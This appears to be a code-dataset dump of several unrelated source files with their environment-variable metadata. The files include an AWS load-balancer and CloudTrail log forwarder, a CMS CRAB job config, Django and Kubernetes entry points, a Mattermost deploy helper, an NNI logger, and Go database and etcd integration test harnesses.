rows = csv.reader(data.splitlines(), delimiter=' ', quotechar='"')
for line in rows:
request = line[11].split(' ')
idx = request[1].find('/', 9)
url = request[1][idx:]
parsed = OrderedDict()
parsed['timestamp'] = line[0]
parsed['elb_name'] = line[1]
parsed['client_ip'] = hashlib.sha256((line[2].split(':')[0] + SALT).encode()).hexdigest()
parsed['backend_ip'] = line[3].split(':')[0]
parsed['request_processing_time'] = line[4]
parsed['backend_processing_time'] = line[5]
parsed['response_processing_time'] = line[6]
parsed['elb_status_code'] = line[7]
parsed['backend_status_code'] = line[8]
parsed['received_bytes'] = line[9]
parsed['sent_bytes'] = line[10]
parsed['method'] = request[0]
parsed['url'] = url
parsed['user_agent'] = line[12]
parsed['ssl_cipher'] = line[13]
parsed['ssl_protocol'] = line[14]
mask = [
'elb_name',
'ssl_cipher'
]
msg = ' '.join([
'"{}"'.format(str(value)) for value in mask_parsed(parsed, mask).values()
])
sock.sendall('{} {}\n'.format(TOKEN, msg))
logger.info('Finished sending file={} to R7'.format(key))
elif validate_alb_log(str(key)) is True:
logger.info('File={} is AWS ALB log format. Parsing and sending to R7'.format(key))
rows = csv.reader(data.splitlines(), delimiter=' ', quotechar='"')
total_run_count = 0
good_run_count = 0
bad_run_count = 0
for line in rows:
total_run_count += 1
try:
request = line[12].split(' ')
url = request[1]
try:
http_version = request[2].split('/')[-1:][0]
except:
http_version = request[2]
parsed = OrderedDict()
parsed['type'] = line[0]
parsed['timestamp'] = line[1]
parsed['elb_id'] = line[2]
parsed['client_ip'] = hashlib.sha256((line[3].split(':')[0] + SALT).encode()).hexdigest()
parsed['client_port'] = line[3].split(':')[1]
parsed['target_ip'] = line[4].split(':')[0]
parsed['target_port'] = line[4].split(':')[1]
parsed['request_processing_time'] = line[5]
parsed['target_processing_time'] = line[6]
parsed['response_processing_time'] = line[7]
parsed['elb_status_code'] = line[8]
parsed['target_status_code'] = line[9]
parsed['received_bytes'] = line[10]
parsed['sent_bytes'] = line[11]
parsed['method'] = request[0]
parsed['url'] = url
parsed['http_version'] = http_version
parsed['user_agent'] = line[13]
parsed['ssl_cipher'] = line[14]
parsed['ssl_protocol'] = line[15]
parsed['target_group_arn'] = line[16]
parsed['trace_id'] = line[17]
mask = [
'elb_id',
'ssl_cipher',
'target_group_arn',
'trace_id'
]
msg = ' '.join([
'"{}"'.format(str(value)) for value in mask_parsed(parsed, mask).values()
])
sock.sendall('{} {}\n'.format(TOKEN, msg))
good_run_count += 1
except IndexError:
bad_run_count += 1
logger.info('[ALB logs] bad log line: {}'.format(line))
pass
logger.info('[ALB logs] total run count: {}'.format(total_run_count))
logger.info('[ALB logs] processed-and-sent run count: {}'.format(good_run_count))
logger.info('[ALB logs] bad run count: {}'.format(bad_run_count))
logger.info('Finished sending file={} to R7'.format(key))
elif validate_cf_log(str(key)) is True:
# date time x-edge-location sc-bytes c-ip cs-method cs(Host)
# cs-uri-stem sc-status cs(Referer) cs(User-Agent) cs-uri-query
# cs(Cookie) x-edge-result-type x-edge-request-id x-host-header
# cs-protocol cs-bytes time-taken x-forwarded-for ssl-protocol
# ssl-cipher x-edge-response-result-type
logger.info('File={} is AWS CloudFront log format. Parsing and sending to R7'.format(key))
rows = csv.reader(data.splitlines(), delimiter='\t', quotechar='"')
for line in rows:
# Skip headers and lines with insufficient values
if len(line) < 23:
continue
msg = "\"{0}T{1}Z\" x_edge_location=\"{2}\"" \
" sc_bytes=\"{3}\" c_ip=\"{4}\" cs_method=\"{5}\"" \
" cs_host=\"{6}\" cs_uri_stem=\"{7}\" sc_status=\"{8}\"" \
" cs_referer=\"{9}\" cs_user_agent=\"{10}\" cs_uri_query=\"{11}\"" \
" cs_cookie=\"{12}\" x_edge_result_type=\"{13}\"" \
" x_edge_request_id=\"{14}\" x_host_header=\"{15}\"" \
" cs_protocol=\"{16}\" cs_bytes=\"{17}\" time_taken=\"{18}\"" \
" x_forwarded_for=\"{19}\" ssl_protocol=\"{20}\"" \
" ssl_cipher=\"{21}\" x_edge_response_result_type=\"{22}\"\n" \
.format(*line)
sock.sendall('{} {}\n'.format(TOKEN, msg))
logger.info('Finished sending file={} to R7'.format(key))
elif validate_ct_log(str(key)) is True:
logger.info('File={} is AWS CloudTrail log format. Parsing and sending to R7'.format(key))
cloud_trail = json.loads(data)
for event in cloud_trail['Records']:
sock.sendall('{} {}\n'.format(TOKEN, json.dumps(event)))
logger.info('Finished sending file={} to R7'.format(key))
else:
logger.info('File={} is unrecognized log format. Sending raw lines to R7'.format(key))
for line in lines:
sock.sendall('{} {}\n'.format(TOKEN, line))
logger.info('Finished sending file={} to R7'.format(key))
except Exception as e:
logger.error('Exception: {}'.format(e))
finally:
sock.close()
logger.info('Function execution finished.')
def create_socket():
logger.info('Creating SSL socket')
s_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = ssl.wrap_socket(
sock=s_,
keyfile=None,
certfile=None,
server_side=False,
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=getattr(
ssl,
'PROTOCOL_TLSv1_2',
ssl.PROTOCOL_TLSv1
),
ca_certs=certifi.where(),
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
)
try:
logger.info('Connecting to {}:{}'.format(ENDPOINT, PORT))
s.connect((ENDPOINT, PORT))
return s
except socket.error, exc:
logger.error('Exception socket.error : {}'.format(exc))
raise SystemExit
def validate_uuid(uuid_string):
try:
val = UUID(uuid_string)
except Exception as uuid_exc:
logger.error('Can not validate token: {}'.format(uuid_exc))
return False
return True
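# The validate_*_log helpers below classify an S3 object key by its filename
# convention: classic ELB access logs, ALB access logs (gzipped), CloudFront
# access logs, and CloudTrail event logs, respectively.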
def validate_elb_log(key):
regex = re.compile('\d+_\w+_\w{2}-\w{4,9}-[12]_.*._\d{8}T\d{4}Z_\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}_.*.log$', re.I)
match = regex.search(key)
return bool(match)
def validate_alb_log(key):
regex = re.compile('\d+_\w+_\w{2}-\w{4,9}-[12]_.*._\d{8}T\d{4}Z_\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}_.*.log.gz$', re.I)
match = regex.search(key)
return bool(match)
def validate_cf_log(key):
regex = re.compile('\w+\.\d{4}-\d{2}-\d{2}-\d{2}\.\w+\.gz$', re.I)
match = regex.search(key)
return bool(match)
def validate_ct_log(key):
regex = re.compile('\d+_CloudTrail_\w{2}-\w{4,9}-[12]_\d{8}T\d{4}Z.+.json.gz$', re.I)
match = regex.search(key)
return bool(match)
def mask_parsed(parsed, mask=[]):
for key in mask: parsed[key] = '-'
for key in list(parsed):
try:
try:
assert float(parsed[key])
except AssertionError:
parsed[key] = '0'
except ValueError:
pass
return parsed
| [] | [] | [
"region",
"salt",
"token"
] | [] | ["region", "salt", "token"] | python | 3 | 0 | |
Kai/crab/NANOv7_NoveCampaign/2017/crab_cfg_2017_tt_SL-HDAMPdown.py | import os
from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config, getUsernameFromCRIC
config = Configuration()
config.section_("General")
config.General.requestName = '2017_tt_SL-HDAMPdown'
config.General.transferOutputs = True
config.General.transferLogs = True
config.section_("JobType")
config.JobType.allowUndistributedCMSSW = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'crab_PSet_2017_tt_SL-HDAMPdown.py'
config.JobType.maxMemoryMB = 3000
config.JobType.maxJobRuntimeMin = 1800
config.JobType.numCores = 1
config.JobType.scriptExe = 'crab_script_2017_tt_SL-HDAMPdown.sh'
config.JobType.inputFiles = ['crab_script_2017_tt_SL-HDAMPdown.py',
os.path.join(os.environ['CMSSW_BASE'],'src/PhysicsTools/NanoAODTools/scripts/haddnano.py'),
]
config.JobType.outputFiles = [] #['hist.root']
config.JobType.sendPythonFolder = True
config.section_("Data")
config.Data.inputDataset = '/TTToSemiLeptonic_hdampDOWN_TuneCP5_PSweights_13TeV-powheg-pythia8/RunIIFall17NanoAODv7-PU2017_12Apr2018_Nano02Apr2020_102X_mc2017_realistic_v8-v1/NANOAODSIM'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
if config.Data.splitting == 'FileBased':
config.Data.unitsPerJob = 1
# config.Data.totalUnits = $TOTAL_UNITS
# config.Data.userInputFiles = []
# config.Data.outLFNDirBase = '/store/user/{}/NoveCampaign/{}'.format(getUsernameFromCRIC(), "2017")
config.Data.outLFNDirBase = '/store/group/fourtop/NoveCampaign/{}'.format("2017")
config.Data.publication = True
config.Data.outputDatasetTag = 'NoveCampaign'
config.section_("Site")
config.Site.storageSite = 'T2_BE_IIHE'
| [] | [] | [
"CMSSW_BASE"
] | [] | ["CMSSW_BASE"] | python | 1 | 0 | |
tests/test_helper.py | # -*- coding: utf-8 -*-
"""Define general test helper attributes and utilities."""
import os
import sys
TRAVIS = os.getenv("TRAVIS_PYTHON_VERSION") is not None
PYTHON_VERSION = "%s.%s" % (sys.version_info.major, sys.version_info.minor)
TMP_DIR = "/tmp"
| [] | [] | [
"TRAVIS_PYTHON_VERSION"
] | [] | ["TRAVIS_PYTHON_VERSION"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cdrc_cms.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [] | [] | [] | [] | [] | python | 0 | 0 | |
config/backend_sql_test.go | // Copyright © 2017 Aeneas Rekkas <[email protected]>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package config
import (
"flag"
"fmt"
"log"
"net/url"
"os"
"strings"
"testing"
"time"
_ "github.com/go-sql-driver/mysql"
"github.com/jmoiron/sqlx"
_ "github.com/lib/pq"
"github.com/ory/dockertest"
"github.com/sirupsen/logrus"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
var (
mysql *url.URL
postgres *url.URL
)
var resources []*dockertest.Resource
func TestMain(m *testing.M) {
flag.Parse()
if !testing.Short() {
mysql = bootstrapMySQL()
postgres = bootstrapPostgres()
}
s := m.Run()
killAll()
os.Exit(s)
}
func merge(u *url.URL, params map[string]string) *url.URL {
    b := new(url.URL)
    *b = *u
    // Query() returns a copy of the parsed values, so mutate the copy and
    // write it back via RawQuery; calling Add on the temporary was a no-op.
    q := b.Query()
    for k, v := range params {
        q.Add(k, v)
    }
    b.RawQuery = q.Encode()
    return b
}
func TestCleanQueryURL(t *testing.T) {
a, _ := url.Parse("mysql://foo:bar@baz/db?max_conn_lifetime=1h&max_idle_conns=10&max_conns=10")
b := cleanURLQuery(a)
assert.NotEqual(t, a, b)
assert.NotEqual(t, a.String(), b.String())
assert.Equal(t, true, strings.Contains(a.String(), "max_conn_lifetime"))
assert.Equal(t, false, strings.Contains(b.String(), "max_conn_lifetime"))
}
func TestSQLConnection(t *testing.T) {
if testing.Short() {
t.Skip("Skipping test in short mode.")
return
}
for _, tc := range []struct {
s *SQLConnection
d string
}{
{
d: "mysql raw",
s: &SQLConnection{
URL: mysql,
},
},
{
d: "mysql max_conn_lifetime",
s: &SQLConnection{
URL: merge(mysql, map[string]string{"max_conn_lifetime": "1h"}),
},
},
{
d: "mysql max_conn_lifetime",
s: &SQLConnection{
URL: merge(mysql, map[string]string{"max_conn_lifetime": "1h", "max_idle_conns": "10", "max_conns": "10"}),
},
},
{
d: "pg raw",
s: &SQLConnection{
URL: postgres,
},
},
{
d: "pg max_conn_lifetime",
s: &SQLConnection{
URL: merge(postgres, map[string]string{"max_conn_lifetime": "1h"}),
},
},
{
d: "pg max_conn_lifetime",
s: &SQLConnection{
URL: merge(postgres, map[string]string{"max_conn_lifetime": "1h", "max_idle_conns": "10", "max_conns": "10"}),
},
},
} {
t.Run(fmt.Sprintf("case=%s", tc.d), func(t *testing.T) {
tc.s.L = logrus.New()
db := tc.s.GetDatabase()
require.Nil(t, db.Ping())
})
}
}
func killAll() {
pool, err := dockertest.NewPool("")
if err != nil {
log.Fatalf("Could not Connect to pool because %s", err)
}
for _, resource := range resources {
if err := pool.Purge(resource); err != nil {
log.Printf("Got an error while trying to purge resource: %s", err)
}
}
resources = []*dockertest.Resource{}
}
func bootstrapMySQL() *url.URL {
if uu := os.Getenv("TEST_DATABASE_MYSQL"); uu != "" {
log.Println("Found mysql test database config, skipping dockertest...")
_, err := sqlx.Open("postgres", uu)
if err != nil {
log.Fatalf("Could not connect to bootstrapped database: %s", err)
}
u, _ := url.Parse("mysql://" + uu)
return u
}
var db *sqlx.DB
var err error
var urls string
    pool, err := dockertest.NewPool("")
    if err != nil {
        log.Fatalf("Could not Connect to docker: %s", err)
    }
    pool.MaxWait = time.Minute * 5
resource, err := pool.Run("mysql", "5.7", []string{"MYSQL_ROOT_PASSWORD=secret"})
if err != nil {
log.Fatalf("Could not start resource: %s", err)
}
if err = pool.Retry(func() error {
var err error
urls = fmt.Sprintf("root:secret@(localhost:%s)/mysql?parseTime=true", resource.GetPort("3306/tcp"))
db, err = sqlx.Open("mysql", urls)
if err != nil {
return err
}
return db.Ping()
}); err != nil {
pool.Purge(resource)
log.Fatalf("Could not Connect to docker: %s", err)
}
resources = append(resources, resource)
u, _ := url.Parse("mysql://" + urls)
return u
}
func bootstrapPostgres() *url.URL {
if uu := os.Getenv("TEST_DATABASE_POSTGRESQL"); uu != "" {
log.Println("Found postgresql test database config, skipping dockertest...")
_, err := sqlx.Open("postgres", uu)
if err != nil {
log.Fatalf("Could not connect to bootstrapped database: %s", err)
}
u, _ := url.Parse(uu)
return u
}
var db *sqlx.DB
var err error
var urls string
pool, err := dockertest.NewPool("")
if err != nil {
log.Fatalf("Could not Connect to docker: %s", err)
}
resource, err := pool.Run("postgres", "9.6", []string{"POSTGRES_PASSWORD=secret", "POSTGRES_DB=hydra"})
if err != nil {
log.Fatalf("Could not start resource: %s", err)
}
if err = pool.Retry(func() error {
var err error
urls = fmt.Sprintf("postgres://postgres:secret@localhost:%s/hydra?sslmode=disable", resource.GetPort("5432/tcp"))
db, err = sqlx.Open("postgres", urls)
if err != nil {
return err
}
return db.Ping()
}); err != nil {
pool.Purge(resource)
log.Fatalf("Could not Connect to docker: %s", err)
}
resources = append(resources, resource)
u, _ := url.Parse(urls)
return u
}
| [
"\"TEST_DATABASE_MYSQL\"",
"\"TEST_DATABASE_POSTGRESQL\""
] | [] | [
"TEST_DATABASE_POSTGRESQL",
"TEST_DATABASE_MYSQL"
] | [] | ["TEST_DATABASE_POSTGRESQL", "TEST_DATABASE_MYSQL"] | go | 2 | 0 | |
staging/src/k8s.io/sample-apiserver/main.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"flag"
"os"
"runtime"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/apiserver/pkg/util/logs"
"k8s.io/sample-apiserver/pkg/cmd/server"
)
func main() {
logs.InitLogs()
defer logs.FlushLogs()
if len(os.Getenv("GOMAXPROCS")) == 0 {
runtime.GOMAXPROCS(runtime.NumCPU())
}
cmd := server.NewCommandStartWardleServer(os.Stdout, os.Stderr, wait.NeverStop)
cmd.Flags().AddGoFlagSet(flag.CommandLine)
if err := cmd.Execute(); err != nil {
panic(err)
}
}
| [
"\"GOMAXPROCS\""
] | [] | [
"GOMAXPROCS"
] | [] | ["GOMAXPROCS"] | go | 1 | 0 | |
cmd/appsctl/mattermost.go | // main handles deployment of the plugin to a development server using the Client4 API.
package main
import (
"os"
"github.com/pkg/errors"
"github.com/mattermost/mattermost-plugin-apps/apps"
"github.com/mattermost/mattermost-plugin-apps/apps/appclient"
)
func getMattermostClient() (*appclient.Client, error) {
siteURL := os.Getenv("MM_SERVICESETTINGS_SITEURL")
adminToken := os.Getenv("MM_ADMIN_TOKEN")
if siteURL == "" || adminToken == "" {
return nil, errors.New("MM_SERVICESETTINGS_SITEURL and MM_ADMIN_TOKEN must be set")
}
return appclient.NewClient("", adminToken, siteURL), nil
}
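// Example setup (a sketch; both values are placeholders for a local server):
//
//   export MM_SERVICESETTINGS_SITEURL=http://localhost:8065
//   export MM_ADMIN_TOKEN=<personal-access-token>
//
// With both set, getMattermostClient returns a client authenticated as the
// admin against that site URL.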
func updateMattermost(m apps.Manifest, deployType apps.DeployType, installApp bool) error {
appClient, err := getMattermostClient()
if err != nil {
return err
}
allListed, _, err := appClient.GetListedApps("", true)
if err != nil {
return errors.Wrap(err, "failed to get current listed apps from Mattermost")
}
d := apps.Deploy{}
for _, listed := range allListed {
if listed.Manifest.AppID == m.AppID {
d = listed.Manifest.Deploy
}
}
// Keep the Deploy part of the stored manifest intact, just add/update the
// new deploy type.
m.Deploy = d.UpdateDeploy(m.Deploy, deployType)
_, err = appClient.StoreListedApp(m)
if err != nil {
return errors.Wrap(err, "failed to add local manifest to Mattermost")
}
log.Debugw("Updated local manifest", "app_id", m.AppID, "deploy_type", deployType)
if installApp {
_, err = appClient.InstallApp(m.AppID, deployType)
if err != nil {
return errors.Wrap(err, "failed to install the app to Mattermost")
}
log.Debugw("Installed app to Mattermost", "app_id", m.AppID)
}
return nil
}
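// Example use (a sketch; the manifest fields and the apps.DeployHTTP value
// are illustrative, not taken from this file):
//
//   m := apps.Manifest{AppID: "hello-world"}
//   if err := updateMattermost(m, apps.DeployHTTP, true); err != nil {
//       // the app was listed but could not be installed
//   }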
| [
"\"MM_SERVICESETTINGS_SITEURL\"",
"\"MM_ADMIN_TOKEN\""
] | [] | [
"MM_SERVICESETTINGS_SITEURL",
"MM_ADMIN_TOKEN"
] | [] | ["MM_SERVICESETTINGS_SITEURL", "MM_ADMIN_TOKEN"] | go | 2 | 0 | |
unesp/wsgi.py | """
WSGI config for unesp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "unesp.settings")
application = get_wsgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
src/sdk/pynni/nni/common.py | # Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ==================================================================================================
from collections import namedtuple
from datetime import datetime
from io import TextIOBase
import logging
import os
import sys
def _load_env_args():
args = {
'platform': os.environ.get('NNI_PLATFORM'),
'trial_job_id': os.environ.get('NNI_TRIAL_JOB_ID'),
'log_dir': os.environ.get('NNI_LOG_DIRECTORY'),
'role': os.environ.get('NNI_ROLE'),
}
return namedtuple('EnvArgs', args.keys())(**args)
env_args = _load_env_args()
'''Arguments passed from environment'''
_time_format = '%Y-%m-%d %H:%M:%S'
class _LoggerFileWrapper(TextIOBase):
def __init__(self, logger_file):
self.file = logger_file
def write(self, s):
if s != '\n':
time = datetime.now().strftime(_time_format)
self.file.write('[{}] PRINT '.format(time) + s + '\n')
self.file.flush()
return len(s)
def init_logger(logger_file_path):
"""Initialize root logger.
This will redirect anything from logging.getLogger() as well as stdout to specified file.
logger_file_path: path of logger file (path-like object).
"""
if env_args.platform == 'unittest':
logger_file_path = 'unittest.log'
elif env_args.log_dir is not None:
logger_file_path = os.path.join(env_args.log_dir, logger_file_path)
logger_file = open(logger_file_path, 'w')
fmt = '[%(asctime)s] %(levelname)s (%(name)s) %(message)s'
formatter = logging.Formatter(fmt, _time_format)
handler = logging.StreamHandler(logger_file)
handler.setFormatter(formatter)
root_logger = logging.getLogger()
root_logger.addHandler(handler)
root_logger.setLevel(logging.DEBUG)
# these modules are too verbose
logging.getLogger('matplotlib').setLevel(logging.INFO)
sys.stdout = _LoggerFileWrapper(logger_file)
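# Example usage (a sketch; 'trial.log' is an illustrative path):
#
#   init_logger('trial.log')
#   print('hello')  # written to trial.log as "[<timestamp>] PRINT hello"
#   logging.getLogger(__name__).info('step done')  # routed to the same file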
| [] | [] | [
"NNI_TRIAL_JOB_ID",
"NNI_PLATFORM",
"NNI_LOG_DIRECTORY",
"NNI_ROLE"
] | [] | ["NNI_TRIAL_JOB_ID", "NNI_PLATFORM", "NNI_LOG_DIRECTORY", "NNI_ROLE"] | python | 4 | 0 | |
tests/framework/integration/cluster.go | // Copyright 2016 The etcd Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package integration
import (
"context"
"crypto/tls"
"fmt"
"io"
"log"
"math/rand"
"net"
"net/http"
"net/http/httptest"
"os"
"reflect"
"sort"
"strings"
"sync"
"sync/atomic"
"time"
pb "go.etcd.io/etcd/api/v3/etcdserverpb"
"go.etcd.io/etcd/client/pkg/v3/testutil"
"go.etcd.io/etcd/client/pkg/v3/tlsutil"
"go.etcd.io/etcd/client/pkg/v3/transport"
"go.etcd.io/etcd/client/pkg/v3/types"
"go.etcd.io/etcd/client/v2"
"go.etcd.io/etcd/client/v3"
"go.etcd.io/etcd/pkg/v3/grpc_testing"
"go.etcd.io/etcd/raft/v3"
"go.etcd.io/etcd/server/v3/config"
"go.etcd.io/etcd/server/v3/embed"
"go.etcd.io/etcd/server/v3/etcdserver"
"go.etcd.io/etcd/server/v3/etcdserver/api/etcdhttp"
"go.etcd.io/etcd/server/v3/etcdserver/api/membership"
"go.etcd.io/etcd/server/v3/etcdserver/api/rafthttp"
"go.etcd.io/etcd/server/v3/etcdserver/api/v2http"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3client"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3election"
epb "go.etcd.io/etcd/server/v3/etcdserver/api/v3election/v3electionpb"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3lock"
lockpb "go.etcd.io/etcd/server/v3/etcdserver/api/v3lock/v3lockpb"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3rpc"
"go.etcd.io/etcd/server/v3/verify"
"go.uber.org/zap/zapcore"
"go.uber.org/zap/zaptest"
"github.com/soheilhy/cmux"
"go.uber.org/zap"
"golang.org/x/crypto/bcrypt"
"google.golang.org/grpc"
"google.golang.org/grpc/keepalive"
)
const (
// RequestWaitTimeout is the time duration to wait for a request to go through or detect leader loss.
RequestWaitTimeout = 5 * time.Second
TickDuration = 10 * time.Millisecond
RequestTimeout = 20 * time.Second
ClusterName = "etcd"
BasePort = 21000
URLScheme = "unix"
URLSchemeTLS = "unixs"
BaseGRPCPort = 30000
)
var (
ElectionTicks = 10
// LocalListenCount counts the listeners created so far; the integration test
// uses unique ports, counting up, to listen for each member, ensuring
// restarted members can listen on the same port again.
LocalListenCount = int32(0)
TestTLSInfo = transport.TLSInfo{
KeyFile: MustAbsPath("../fixtures/server.key.insecure"),
CertFile: MustAbsPath("../fixtures/server.crt"),
TrustedCAFile: MustAbsPath("../fixtures/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoWithSpecificUsage = transport.TLSInfo{
KeyFile: MustAbsPath("../fixtures/server-serverusage.key.insecure"),
CertFile: MustAbsPath("../fixtures/server-serverusage.crt"),
ClientKeyFile: MustAbsPath("../fixtures/client-clientusage.key.insecure"),
ClientCertFile: MustAbsPath("../fixtures/client-clientusage.crt"),
TrustedCAFile: MustAbsPath("../fixtures/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoIP = transport.TLSInfo{
KeyFile: MustAbsPath("../fixtures/server-ip.key.insecure"),
CertFile: MustAbsPath("../fixtures/server-ip.crt"),
TrustedCAFile: MustAbsPath("../fixtures/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoExpired = transport.TLSInfo{
KeyFile: MustAbsPath("./fixtures-expired/server.key.insecure"),
CertFile: MustAbsPath("./fixtures-expired/server.crt"),
TrustedCAFile: MustAbsPath("./fixtures-expired/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoExpiredIP = transport.TLSInfo{
KeyFile: MustAbsPath("./fixtures-expired/server-ip.key.insecure"),
CertFile: MustAbsPath("./fixtures-expired/server-ip.crt"),
TrustedCAFile: MustAbsPath("./fixtures-expired/ca.crt"),
ClientCertAuth: true,
}
DefaultTokenJWT = fmt.Sprintf("jwt,pub-key=%s,priv-key=%s,sign-method=RS256,ttl=1s",
MustAbsPath("../fixtures/server.crt"), MustAbsPath("../fixtures/server.key.insecure"))
// UniqueNumber is used to generate unique port numbers
// Should only be accessed via atomic package methods.
UniqueNumber int32
)
type ClusterConfig struct {
Size int
PeerTLS *transport.TLSInfo
ClientTLS *transport.TLSInfo
DiscoveryURL string
AuthToken string
QuotaBackendBytes int64
MaxTxnOps uint
MaxRequestBytes uint
SnapshotCount uint64
SnapshotCatchUpEntries uint64
GRPCKeepAliveMinTime time.Duration
GRPCKeepAliveInterval time.Duration
GRPCKeepAliveTimeout time.Duration
ClientMaxCallSendMsgSize int
ClientMaxCallRecvMsgSize int
// UseIP is true to use only IP for gRPC requests.
UseIP bool
// UseBridge adds bridge between client and grpc server. Should be used in tests that
// want to manipulate connection or require connection not breaking despite server stop/restart.
UseBridge bool
// UseTCP configures server listen on tcp socket. If disabled unix socket is used.
UseTCP bool
EnableLeaseCheckpoint bool
LeaseCheckpointInterval time.Duration
LeaseCheckpointPersist bool
WatchProgressNotifyInterval time.Duration
ExperimentalMaxLearners int
StrictReconfigCheck bool
}
type Cluster struct {
Cfg *ClusterConfig
Members []*Member
LastMemberNum int
mu sync.Mutex
clusterClient *clientv3.Client
}
func SchemeFromTLSInfo(tls *transport.TLSInfo) string {
if tls == nil {
return URLScheme
}
return URLSchemeTLS
}
func (c *Cluster) fillClusterForMembers() error {
if c.Cfg.DiscoveryURL != "" {
// Cluster will be discovered
return nil
}
addrs := make([]string, 0)
for _, m := range c.Members {
scheme := SchemeFromTLSInfo(m.PeerTLSInfo)
for _, l := range m.PeerListeners {
addrs = append(addrs, fmt.Sprintf("%s=%s://%s", m.Name, scheme, l.Addr().String()))
}
}
clusterStr := strings.Join(addrs, ",")
var err error
for _, m := range c.Members {
m.InitialPeerURLsMap, err = types.NewURLsMap(clusterStr)
if err != nil {
return err
}
}
return nil
}
func (c *Cluster) Launch(t testutil.TB) {
errc := make(chan error)
for _, m := range c.Members {
// Members are launched in separate goroutines because if they boot
// using discovery url, they have to wait for others to register to continue.
go func(m *Member) {
errc <- m.Launch()
}(m)
}
for range c.Members {
if err := <-errc; err != nil {
c.Terminate(t)
t.Fatalf("error setting up member: %v", err)
}
}
// wait Cluster to be stable to receive future client requests
c.WaitMembersMatch(t, c.HTTPMembers())
c.waitVersion()
for _, m := range c.Members {
t.Logf(" - %v -> %v (%v)", m.Name, m.ID(), m.GRPCURL())
}
}
func (c *Cluster) URL(i int) string {
return c.Members[i].ClientURLs[0].String()
}
// URLs returns a list of all active client URLs in the Cluster
func (c *Cluster) URLs() []string {
return getMembersURLs(c.Members)
}
func getMembersURLs(members []*Member) []string {
urls := make([]string, 0)
for _, m := range members {
select {
case <-m.Server.StopNotify():
continue
default:
}
for _, u := range m.ClientURLs {
urls = append(urls, u.String())
}
}
return urls
}
// HTTPMembers returns a list of all active members as client.Members
func (c *Cluster) HTTPMembers() []client.Member {
ms := []client.Member{}
for _, m := range c.Members {
pScheme := SchemeFromTLSInfo(m.PeerTLSInfo)
cScheme := SchemeFromTLSInfo(m.ClientTLSInfo)
cm := client.Member{Name: m.Name}
for _, ln := range m.PeerListeners {
cm.PeerURLs = append(cm.PeerURLs, pScheme+"://"+ln.Addr().String())
}
for _, ln := range m.ClientListeners {
cm.ClientURLs = append(cm.ClientURLs, cScheme+"://"+ln.Addr().String())
}
ms = append(ms, cm)
}
return ms
}
func (c *Cluster) mustNewMember(t testutil.TB) *Member {
memberNumber := c.LastMemberNum
c.LastMemberNum++
m := MustNewMember(t,
MemberConfig{
Name: fmt.Sprintf("m%v", memberNumber-1),
